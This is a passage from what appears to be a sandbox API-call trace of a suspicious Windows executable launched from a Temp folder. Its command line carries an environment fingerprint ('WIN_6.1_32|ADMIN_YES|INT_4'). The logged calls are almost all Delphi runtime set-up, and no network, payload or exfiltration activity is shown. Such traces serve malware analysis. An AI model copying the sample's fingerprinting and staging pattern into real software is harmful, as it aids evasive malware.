wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0108.802] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.802] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0108.802] GetACP () returned 0x4e4 [0108.802] GetCurrentThreadId () returned 0xcc4 [0108.802] GetVersion () returned 0x1db10106 [0108.802] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x2e1cd0, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.802] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.802] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.803] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x12f0000 [0108.803] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] 
RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.803] GetUserDefaultUILanguage () returned 0x409 [0108.804] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0108.804] GetThreadUILanguage () returned 0x120409 [0108.804] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0108.804] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x141a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x141a680, pcchLanguagesBuffer=0x12d768) returned 1 [0108.804] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.805] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.805] GetUserDefaultUILanguage () returned 0x409 [0108.805] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0108.805] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.805] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.805] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: 
lpBuffer="Variant method calls not supported") returned 0x22 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | 
out: lpBuffer="Range check error") returned 0x11 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0108.806] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0108.806] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.806] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0108.806] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2f4468 [0108.806] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0108.806] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xfff9, 
lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0108.807] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0108.807] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.807] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.807] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0108.807] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13e80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0108.807] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0108.807] GetModuleFileNameW (in: hModule=0x0, 
lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.807] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.807] GetThreadLocale () returned 0x409 [0108.807] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0108.807] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0108.807] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.808] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0108.808] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0108.808] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2f4478 [0108.808] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0108.808] 
GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0108.808] GetLastError () returned 0x7a [0108.808] GetLogicalProcessorInformation (in: Buffer=0x13d99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13d99d0, ReturnedLength=0x12fab0) returned 1 [0108.808] GetCurrentThreadId () returned 0xcc4 [0108.808] GetCurrentThreadId () returned 0xcc4 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0108.808] GetThreadLocale () returned 0x409 [0108.808] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0108.808] GetThreadLocale () returned 0x409 [0108.808] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0108.808] GetCurrentThreadId () returned 0xcc4 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0108.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: 
lpLCData="Thu") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: 
lpLCData="Jun") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0108.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: 
lpLCData="0") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.810] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0108.810] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0108.810] GetProcAddress (hModule=0x76c10000, 
lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0108.810] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0108.810] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0108.810] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0108.810] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0108.811] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0108.812] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0108.812] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0108.812] CreateEventW 
(lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0108.812] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0108.812] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0108.812] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16560107727) returned 1 [0108.812] GetTickCount () returned 0x260a5 [0108.812] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x108)) [0108.812] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x108)) [0108.812] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16560126151) returned 1 [0108.812] GetTickCount () returned 0x260a5 [0108.812] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x108)) [0108.812] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x108)) [0108.812] 